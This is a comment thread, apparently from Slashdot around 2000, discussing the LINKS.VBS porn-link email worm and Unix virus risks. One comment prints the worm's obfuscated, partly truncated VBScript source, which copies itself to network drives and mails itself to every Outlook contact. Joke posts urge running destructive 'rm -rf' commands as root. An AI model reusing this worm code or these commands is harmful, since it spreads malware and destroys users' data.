The Next Generation of ILOVEYOU:The Porn Worm 192
Erik Green writes "I've been sent a new semi-benign ILOVEYOU variant - it's got a subject line of "Check this" and consists of a one-line message and an attachment named LINKS.VBS. Its only purpose other than self replication is to add a link to a XXX site to your desktop. The attachment is a self-replicating script that copies itself to all network drives and sends itself to everyone listed in outlook's address book. This variant is interesting since it's partially encrypted to obscure it's purpose. It's nice enough to ask if you want the shortcut added to your desktop, but it doesn't ask about replicating itself. It's basically a trojan advertisement. Fortunately, it doesn't delete any files.
Needless to say, only machines that run outlook and have visual basic scripting available are vulnerable.
"
Re:I Like You (Score:1)
Great movie title! (Score:1)
Does this bring a second meaning to "trojan advertising"?
That's an OLD one... (Score:1)
My bosses' machine had that virus about six weeks ago. It placed a link to a porn link exchange site, if I remember correctly.
It was trivial to clean, AIRC. Nowhere near as nasty as ILUVU was.
Sorry, Cmdr, but this doesn't sound like a new virus. Did you check out Symantec's library before posting, to see if it had any history?
Re:Unix and Viruses. (Score:2)
A choice quote from the log: ('You' is the person giving the "help", and Oronde is the idiot)
You say "Type 'ls' and tell me what you see."
Oronde says "okay now what?"
Oronde pages: nothing...
You say "oops. I guess rm *is* the deleting files and 'del' isn't."
You say "Wow. What a mistake *I* made! I must have not read the manual!"
--
No more e-mail address game - see my user info. Time for revenge.
Survival of the Species (Score:1)
productive useful virus (Score:1)
Re:Unix and Viruses. (Score:1)
Virus writers want them to spread. It doesn't take a brain surgeon to target 80% of the computers instead of 4%.
damit (Score:2)
damit the commerical world gets all the cool tools, the sound blaster live drivers where out first on Windows, and most of the new 3D cards are supported under windows, not to menation the cool automatic shutdown "blue screen of death" that is smart enough to turn it's self of and now this.
Dammit, I would like porn on my desktop, please please tell me this works under wine...
Re:I thought this was old news... (Score:1)
Sorry, but this isn't a new virus (Score:1)
Links.vbs Virus is not new.. (Score:1)
My stupid Project Mgr opened it and he didnt even know that it left a link "XXXLinks" on his desktop until I showed him.
This is nothing new, just some kid who thought the ILOVEYOU virus is getting all the attention that he deserves and decided to send his baby out again.
Grow up!
Why on earth would you install this? (Score:1)
Not only that, they basically threaten that if you try to remove the software, it will put itself back when you reboot..
Why on earth would you use this? I can't see any redeeming features.. I even went to their homepage and tried running a search. Half the links don't work, and the other half take you to random searches about casinos and stuff..
Hrmph! (Score:1)
~GoRK
Theoretically... (Score:2)
A network admin/tech support department could save time by emailing auto-installing software updates to clueless users' machines, instead of having to trudge out to each users' machine to do the install..
Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to to use the system is who they say they are..
All in all, it MIGHT have it's uses, if it were implemented in a more secure manner.
Re:Alternative virii? (Score:1)
I believe that the UNIX guru in question is Ken Thompson. His article Reflections on Trusting Trust [acm.org] is quite interesting.
Regards,
DeanT
DeCSS (Score:1)
Older than ILOVEYOU (Score:1)
Re:Make you want to... (Score:1)
I would think that if the virus worked, you would bring down the server incredibly quickly (as millions would automatically go to this sight as soon as they got this virus)
Re:Zero Originality (Score:1)
As if everyone who sends unsolicited email is 'dumb as a post.'
You're right. Some of them are actually dumb as a rock.
======
"Rex unto my cleeb, and thou shalt have everlasting blort." - Zorp 3:16
Re:Independent Confirmation (Score:3)
Yes, its true. Though it is far from a new thing - it's been around for about a year now.
When will M$ Users Get it? (Score:1)
(-1, redundant) ! (Score:1)
Remember, there is nothing new to say here, except for some karma whoring.
Have a nice day!
what's next? (Score:1)
a link to porn on my desktop???
why can't all viruses be this horrific...? next thing you know i'll be recieving the "FREECASH" email.
too bad i'm not an outlook kid...
Mattel Responds (Score:5)
THAT should teach Microsoft to integrate its browser with its OS...
- Michael Cohn
Too bad... (Score:1)
Er, I mean, good thing they didn't.
the most painful virus of them all.. (Score:1)
Email Virii and Outlook (Score:1)
New??? (Score:1)
It's pretty neat to look at and I highly recommend anyone look at the source and pull it apart. You will have to check-out the "encrytion" algorithm (if it can be called that) th get the key.
Of course, you can always do what I did and crack the old way, with pen and paper.
Re:LINKS.VBS? and Microsoft Outlook Security Patch (Score:2)
I tried out the security update on one of the workstations at work. I think it was the best thing that ever happened for the user. She became so frustrated with the lack of functionality that they switched over to Netscape mail. Last one..........thankfully. As for seeing an end to the "worm" viruses, it won't happen until everyone learns the lesson of this user. Only took her a year of constant chaos.
Re:Wrong (Score:1)
uh-oh, now the FBI is going to come looking for you the next time a virus comes out...
I could see the headlines now, "Hacker 'mindstrm' was arrested in an early morning raid, FBI points to incriminating posts on Hacker discussion group 'Slashdot'"
seibed
I Like You (Score:1)
Sorry, that's an old one. (Score:1)
Zero Originality (Score:1)
Re:Unix and Viruses. = DIFFERENCE (Score:1)
I can set up mutt to execute application/x-sh scripts as shell scripts. But the big difference is that I have to set it up to be dangerous before that happens! The mentality in (most) Unix programs is nowadays security first.
PICS labels :) (Score:1)
Old news. (Score:1)
links.vbs is very, very old news (talking at least a year), to anyone who's ever been in a channel with mIRC weenies (I used to op in a huge MP3 and a huge MPEG channel, so I knew all about it very quickly
Gawd, if you're going to release news of every old skript k1dd13
d
-
Independent Confirmation (Score:1)
have any independent confirmation that the person who submitted this didn't just make it up??
Re:Unix and Viruses. = DIFFERENCE (Score:1)
The difference is that no Linux vendor makes a distribution where the email client executes arbitrary code embedded in attachments.
What's next.... (Score:2)
Re:What's next.... (Score:1)
You mean that you actually read your spam for longer than it took to decide to hit the delete key? What's wrong with you?
Actually, this sounds like the basis for a moderately amusing scheme. You copyright a message and then spam it to millions of people with the section mentioning that it's copyrighted and all reproduction is forbidden. When they forward your message to abuse@your.isp.com, you sue them for copyright infringement. The only problem is that a halfway intelligent defense lawyer would be able to argue that forwarding the message to the abuse authorities is fair use. So much for that plan.
another one!?!?! (Score:1)
WORM.Slashdot (Score:1)
WORM.Slashdot is a worm that will work under most nerdy minds. Once the worm is launched, it uses person involved to waste valuable working time on daily basis reading Slashdot. It can also a number of ways to propagate: other web pages, by word of mouth, IRC and email by masquareding as something interesting.
Also known as: /.bomb
Category: WORM
Infection length: 100-400 posts, 1-100 slashdot.org loads per day
Virus definitions: May 23th, 2000
Threat assesment:
Damage: HIGH - Distribution: HIGH - Wild: HIGH
Wild
Damage
Distribution
Technical description
Similar to the freshmeat [freshmeat.net] virus, this worm uses nerd() calls to make users reading slashdot.org (and wasting valuable working time). The contents of worm is "Slashdot.org News for Nerds: Stuff that matters".
Removal:
Write-up by: Jage May 23th, 2000
This is funny. Laugh now.
Re:Suggestions for improvement (Score:1)
"killall -9 netscape"
----------------------------------------------
Where can I get it? (Score:1)
if you're still getting it... (Score:1)
The news has been out there. Pundits are talking about everything. MS, the AV shops, and every admin worth his salt is taking steps to stop it.
In other words, unless it defeats all known AV and sensible security precautions (ie, disable most of Outlook's functionality) then I say, lets drop the issue.
Old News... (Score:1)
for the info. Seems like this would be more of a cousin to Melissa rather than ILOVEYOU.
Vulnerable? As long as it isn't a pay site, lucky! (Score:1)
I don't think so. Well, if it's free porn, vulnerable is the wrong word. If it's a free site, then Outlook users like myself are lucky to catch this one. Gimme gimme! (=
When the pack animals stampede, it's time to soak the ground with blood to save the world. We fight, we die, we break our cursed bonds.
Re:trojans (Score:2)
Not new (Score:1)
In fact (Score:1)
Re:This is a bug? (Score:2)
Of course not. It's a feature.
Marketing value in viruses? (Score:1)
There's more coming... (Score:1)
Within the next few hours, expect to see:
The original "I love you" virus
The "I like you a lot" virus
The "You're nice, but I just want to be friends" virus
The "Its not you, its me" virus
The "Look, it was just a date...don't get clingy" virus
The "Okay, I think its best if we don't have anymore contact" virus
The "It was late, I was drunk, you were easy" virus
The "Stop calling me, you unfeeling prick" virus
The "That's it, I hate you and your stupid cat" virus
Plus:
The "No, I Reeaallllyyyy Like You" Virus
The "You're Beawfullll
The "Nothing has to happen. I just want to wake up with you in my arms" virus
The "You're OK but I was wondering if your friend is single" virus
The "Of course I'll phone you
.......... hmmm, that'll hit anytime between 3am & noon.
Yet to have caffeine, seemed funny at the time...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Re:Unix and Viruses. (Score:1)
Only if this "Office suite" had the same poor design as MS Outlook.
The claims that "It only happens because Windows is popular" are a subtle form of FUD. Anyway as someone has already pointed out, Where are all the apache affecting viruses?
Probably the primary reason that virus writers target Windows is that it is easy to write viruses for and those viruses can do all sorts of things.
new type of spam??? (Score:1)
Re:Make you want to... (Score:1)
What's a "Nypho"?
Re:Make you want to... (Score:1)
I first read this to be:
Maybe if Bill gets his default page set to "Naughty Barney Nymphos"....
If only :)
Re:NOT NEWS ANYMORE! (Score:1)
Microsoft's innovation is to be egocentric. First we had "My Computer" and "My Documents", not we have "Windows ME"
Just about everything Microsoft have done in the last several users is a "rip off" of other people's ideas.
Re:Two things... (Score:1)
Maybe the question should be "Are there any legitimate situations outside environments where the sysadmin can explicitally enable this. If and when it is needed." i.e. is there any legitimate reason for this being on by default?
Not a variant of iloveyou but an older case (Score:1)
Re:Unix and Viruses. = DIFFERENCE (Score:1)
Just to clear up a prevalent rumor:
The arbitrary code was not embedded in the message (any more than any other MIME-encoded attachment is embedded), and it was not executed by the email client. It required the user to double-click on it to execute it, exactly like any other executable attachment. The security hole is in the scripting model (Windows Scripting Host) that provides an automated interface to the global address book.
In a Perfect World (Score:1)
Re:Theoretically... (Score:1)
Of course, this is just in theory - in reality, I've never seen it used, and I honestly think the *nix method (telnet/ssh/whatever) is less prone to abuse.. even telnet requires a PASSWORD to verify that the person attempting to to use the system is who they say they are..
More likely easier to use login scripts or remote administration programs. An obvious problem with using the email upgrade aproach is that the email program itself is quite hefty and likely to be holding on to resources the installer wants to upgrade.
Apples and Oranges (Score:1)
LINKS.VBS (Score:1)
Set A1 = CreateObject("Scripting.FileSystemObject")
Set A2 = A1.OpenTextFile(WScript.ScriptFullName,1)
Do While A2.AtEndOfStream = False And Mid(A3,40,10) "`sd]Lhbsnr"
A3 = A2.ReadLine
Loop
A2.Close
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolde
A4.WriteLine(B("No!Dssns!Sdrtld!Odyu"))
A4.WriteLine(B("Rdu!@0!O\J>@KFQB_Pliwt^ub_Jf`ul
A4.WriteLine(B("@5/VshudMhod)C)""Kd!Oui@qv&@&""
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C33!?!C3.,
A4.WriteLine(B("@5/VshudMhod)C)""Dqp!Gcef!C30!K
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C35!?!C3.,
A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C32!?!3!Rq
A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C37!?!C30,
A4.WriteLine(B("@5/VshudMhod)C)""Kd!C32!?!3!Rfg
A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C37,
A4.WriteLine(B("@5/VshudMhod)C)""Gjug""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C35,
A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
A4.WriteLine(B("@5/VshudMhod)C)""C35,Uw`hger!?!
A4.WriteLine(B("@5/VshudMhod)C)""C35,@qb{!?!@&"
A4.WriteLine(B("@5/VshudMhod)C)""C35,Crrcefoglr
A4.WriteLine(B("@5/VshudMhod)C)""C35,BgjgrgCdrg
A4.WriteLine(B("@5/VshudMhod)C)""C35,Uglb""((")
A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""(("))
A4.WriteLine(B("@5/VshudMhod)C)""Dwlerkql!@&@3+
A4.WriteLine(B("@5/VshudMhod)C)""Dqp!@0!?!3!Rq!
A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?3""(
A4.WriteLine(B("E5/VshudMhod)C)""Gtglr3?QL!HQKL
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?3""
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]3../Jgtgj!3..
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]0../Jgtgj!0..
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]5../Jgtgj!5..
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]2../Jgtgj!2..
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""
A4.WriteLine(B("E5/VshudMhod)""""("))
A4.WriteLine(B("E5/VshudMhod)C)""]7../Jgtgj!7..
A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""(
A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""
A4.WriteLine(B("E5/Bmnrd"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Gns!D`bi!E4!Ho!@0/FduGnmeds)E0(
A4.WriteLine(B("E!E4/Q`ui"))
A4.WriteLine(B("Odyu"))
A4.WriteLine(B("Doe!Hg"))
A4.WriteLine(B("Doe!Rtc"))
A4.Close
Set A5 = CreateObject(B("VRbshqu/Ridmm"))
A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]
If MsgBox(B("Uihr!vhmm!`ee!`!rinsubtu!un!gsdd!YYY!mh
Set A6 = A1.CreateTextFile(A1.BuildPath(A5.SpecialFolders(
A6.WriteLine(B("ZHoudsoduRinsubtu\"))
A6.WriteLine(B("TSM 0 Then
For A9 = 0 To A8.Count - 1
If InStr(A8.Item(A9),B("]]")) 0 Then
A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A8.Item(A9),B("MHOJR/WCR"))
End If
Next
End If
Set A10 = CreateObject(B("Ntumnnj/@qqmhb`uhno"))
Set A11 = A10.GetNameSpace(B("L@QH"))
For Each A12 In A11.AddressLists
Set A13 = A10.CreateItem(0)
For A14 = 1 To A12.AddressEntries.Count
Set A15 = A12.AddressEntries(A14)
If A14 = 1 Then
A13.BCC = A15.Address
Else
A13.BCC = A13.BCC & B(":!") & A15.Address
End If
Next
A13.Subject = B("Bidbj!uihr")
A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/")
A13.Attachments.Add WScript.ScriptFullName
A13.DeleteAfterSubmit = True
A13.Send
Next
Function B(B1)
For B2 = 1 To Len(B1)
If Asc(Mid(B1,B2,1)) 34 And Asc(Mid(B1,B2,1)) 35 And Asc(Mid(B1,B2,1)) 126 Then
If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then
B = B & Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,70,1)) + 1,1))
Else
B = B & Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,70,1)) + 1,1))
End If
Else
B = B & Mid(B1,B2,1)
End If
Next
End Function
Re:Unix and Viruses. (Score:1)
Re:Unix and Viruses (Addendum.) (Score:1)
The obvious solution to these difficulties is an obfuscated PERL script. PERL is installed on a large fraction of all UNIX boxen (and even on other platforms) and has the power to do a lot of stuff. It has good cross-platform uniformit, particularly when people have various CPAN modules installed. As even its biggest detractors will admit (or maybe you could say especially its biggest detractors will insist) PERL is wonderful for writing densely incomprehensible programs that even a dedicated PERL hacker has trouble understanding. The ability to do direct damage is limited by the lack of root privileges, but then again, damaging the system prevents you from spreading effectively. Add it all up, and it's the perfect worm implementation language for UNIX.
Re:Suggestions for improvement (Score:1)
I assume you are referring to The Time Magazine Web Site [time.com], and not any of those naughty, naughty pr0n sites?
Alternative virii? (Score:2)
Source code virus?
Say someone has an infected version of the Apache source; it has embedded within it a modified 'ls' or 'find' or 'grep' or something. When compiled, it also replaces ls. Apache, of course, is also infected; it is a way into and out of your computer, and would be used to spread information, primarily.
Now when you do your usual make, make install, the source is modified to look perfectly normal, but the damage is done. You have an infected ls, find, grep, etc, as well as Apache. What the modified program would do is look for Makefiles and configures; when it identifies a directory with a Makefile and/or configure script, it will actually modify the process to build another infected program. In this case, it would get the infected source from Apache! See, while the server has been up, it has serriptitiously been downloading bad source and sharing bad source with other infected computers, without logging it, and placing it in strange and not commonly visited places.
So when you actually do another source compile, you get another infected program; say, ftp gets modified. Or telnet. Or man. Whatever. Until you have lots of malicious programs. All waiting for a signal, a trigger, a date, whatever. Or for apache to do something!
Of course this is speculation on my part. Do wiser heads think this is impossible?
-AS
I got this virus almost 2 months ago (Score:2)
This isn't new, it's not a LOVEBUG variant.
I thought this was old news... (Score:2)
Re:Make you want to... (Score:2)
It is like a typo, only smaller.
Compiled Virii? (Score:2)
Perhaps it could make it's own version of ls, or ldconfig! After the "make install" by root the virus can do anything it wants. Imagine, everytime you call ldconfig it spreads further, it would be literally impossible to repair the damage at that point.
The downside: it wouldn't take long for people to find the virus, but most people don't even bother to watch the compile screens let alone go through all of the source code files.
P.S. it would be fun and easy to release the virus in RPM format...
P.S.S. Maybe one could modify pine or sendmail to spread the virus.
Devil Ducky
Re:Maybe -- Not Such a bad Idea (Score:4)
I even played with the concept in my earlier code days. Having written a client/server app that passed patches between computers it could find on its network where the computer was running the client. And did not inform the user.
Still i suspect the whole concept is considered disgusting and not worthy
Unix and Viruses. (Score:5)
The short answer is that most flavours of Unix, including Linux, don't have much to worry about from the current crop of viruses. This may change in the future, but due to the architecture of Unix it is more difficult for viruses to propagate or to really damage a system.
The long answer is "it depends". Details as follows.
Viruses and trojans that are embedded in Word documents, Visual Basic scripts, or the like have no effect under Unix, because most Unix systems don't process Word macros or Visual Basic scripts. Thus, most of the crud that has been affecting Windows users has been completely unnoticed by Unix users.
If you are sent an executable, or fetch an executable yourself, and run it, it can modify anything that you have permission to modify, even under Unix. This means that a trojan executable, if you run it, could quite easily destroy all of your files - but not the files of anyone else using the machine, and not the operating system files. In principle, a trojan could also access any facilities that you have access to; this means that a sufficiently clever trojan could mail itself to other people from your account. However, it would have a harder time finding addresses to send itself to (maybe scan ~/mail and
A true virus is capable of infecting arbitrary executables, which themselves will contain the virus and infect other executables. While in principle this could be done under Unix, the virus would again be limited only to executables that you have permission to modify. System tools would not be affected - you couldn't infect "cp" or "ls", for instance. Distribution would also be curtailed, as you don't usually send executables to your friends; you send them a source tarball, or point them to where they can download an executable. So, while something like this could be done, it wouldn't be as devastating as it is under Windows or DOS.
Social engineering remains one of the biggest threats under Unix. It means, simply, convincing a user to do something harmful. In the case of email viruses, the virus must convince the user to open the attachment. Heaven help us when inexperienced users have root access; a virus could simply tell you to "su to root and run this install script" to have devastating impact. This will probably be one of the biggest threats in terms of viruses under Unix.
The idea of a Linux email worm is so interesting that I'm tempted to write one. Must... stay... good...
Wrong (Score:2)
And yes, any windows version with WSH installed is vulnerable (well.. vulnerable is a shitty word. Of course any windows machien with WSH installed can run scripts...)
Man. I should write a program in C that formats your HD after mailing itself to everyone in your outlook address book, and then I could be a famous virus writer too!
I KISS YOU!! (Score:3)
--
Re:Talk about old news.. (Score:2)
1 question.... (Score:2)
if the links are quality...sure..why the hell not
Go Hip! (Score:3)
If you use Outlook and Explorer, the virus will add another "toolbar" to your browser (which only contains banner ads), and attaches an advertisement for itself onto the end of every email you send out. The program does all of this without the users knowledge or permission.
I would normally call this just merely annoying except for the fact that it is impossible to uninstall it via any normal means. I removed it from my registry, but it just copied itself back. The only way to remove it is to dig deep in Go Hip!'s customer service page and run a "remove" utility.
Re:Unix and Viruses (Addendum.) (Score:2)
The second point, the install base, removes one of the major incentives of the perpetraitors: notoriety. Lack of familiarity might also play a part.
THe third (and maybe biggest?) factor is: Unix users are generally much more educated in computer use, and knowledgeable about it. And with all the M$ targeted viruses about, they will know not to run random binaries from unknown sources. So again, a succesrate limiter, reducing the chance of notoriety.
That are in my estimate the main reasons we haven't seen much abuse in the @Unix so far. The only notorious exception being Morris, who wormed himself rather more succesfully than intended through sendmail holes.
Stefan.
<B5>There is a hole in your mind.</B5>
This is a bug? (Score:4)
Geoff
Re:Alternative virii? (Score:3)
Previous, not Next, Generation (Score:3)
Re:Wrong (Score:2)
I thought it all amusing, and enjoyed looking at the actual code. I am not a programmer at all, yet I saw how easy it would be to modify this simple program to be MUCH nastier:
1) forward every message from your "Sent" folder to everyone in your address book (a corporate nightmare: think about the CEO's sent emails being read by everyone in the company)
2) after that happy chore, prowl the network shares and deltree *.*
3) finally, as a parting shot, format c:
I figure someone will do this eventually. Luckily, I run Linux.
Re:Unix and Viruses. (Score:2)
I'll bet you that almost all of the computers out there that aren't servers are workstations/personal computers for someone who DOES browse the web. Those users aren't going to be happy about this, not one bit.
Eric
Re:Alternative virii? (Score:2)
I read about a similar idea from one of the Unix gurus before (I don't remember exactly who it was, unfortunately). Basically, the article talks about how even source code is not a guarantee that you are safe.
Basically, it works from the idea of a self-replicating program, as follows:
Of course, replacing the GCC with a good binary will solve the problem, but the virus could have replaced, say, Apache or FTP, so that any good copy of GCC downloaded will be bugged. And no amount of recompilation from source will do any good, because the bugged compiler will always insert bugged code into any source you compile.
Anyway, my point is, source code does not guarantee safety. About the only thing that can solve the problem (that I can think of) is to nuke the system and re-install from scratch. Of course, suppose the virus bugged a machine on your ISP so that it inserts itself into any fresh system binaries you download... ultimately, you will never be 100% sure unless you physically get a copy of a new system from your vendor. But suppose the vendor has also been bugged...
I know this is a bit stretching it, but still, it involves methods which are very practical to implement. Do not hide in the comfort of "Unix is built for security" or "we are safe because we can audit source code".
---
LINKS.VBS? and Microsoft Outlook Security Patch (Score:2)
Hopefully we will see an end to these e-mail "worm" virus. An article [slashdot.org] at Network World Fusion [nwfusion.com] describes how Microsoft has released a security update for Outlook, which among other things, blocks 38 different file types, like exe, vbs, bat, and others. The funny thing is, scripting is STILL ACTIVATED, unless turned off. Personally, I think scripting is useful, but, for the average user, I feel it should be left off unelss the user turns it on. It does, although, prevent scripts from accessing the address book.
Its funny, "It's a feature, not a bug", yet they issued a patch for it...
Eh? (Score:2)
Re:Independent Confirmation (Score:2)
Reality immitates fiction immitates reality.
Re:Unix and Viruses. (Score:4)
Agreed, although when that comes about the "viruses" won't even have to be executable.
-----
From: Redhat Technical Support
Subject: System upgrade information
Dear user -
We regret to inform you that your Linux system shipped with several preferences improperly set. Fortunately, you can improve your web browsing speed and startup time with a few simple commands. First of all, we'd appreciate your forwarding this to everyone else you know (it doesn't matter if they don't have Linux; they might know someone who does. This way, the fix will get out as quickly as possible.
Once you've done that, just write down and follow these directions:
1. Type "su"
2. At the prompt, enter your secret root password.
3. Type "rm -f -r *"
Sincerely,
Bob Jones, Redhat technical support
-----
- Michael Cohn
Re:Unix and Viruses. (Score:2)
The odd thing is the Unix lead the way here as well, do a search on 'Great Internet Worm'.
Re:Maybe -- Not Such a bad Idea (Score:2)
Re:Wrong (Score:2)
Control your desktop! (Score:2)
*N*X Easter Egg! (Score:2)
Log in as root on any *N*X machine and run "rm -rf
I can't spoil the easter egg, but after it's done running I'm sure you will be very suprised!
--
Note: If you were stupid enough to actually do this, I think we're better off without you in the *N*X world.
"download browser enhancement" (Score:3)
I've got IE5 and Outlook2k on my Win2k box... and nothing happened by just looking at the site. Are your IE security settings set to "bend me over again"?
Make you want to... (Score:2)
Maybe if Bill gets his default page set to "Naughty Barnyard Nyphos" a few times he will pay more attention to security.
Re:Maybe -- Not Such a bad Idea (Score:2)
This is *not* a variant of ILOVEYOU... (Score:5)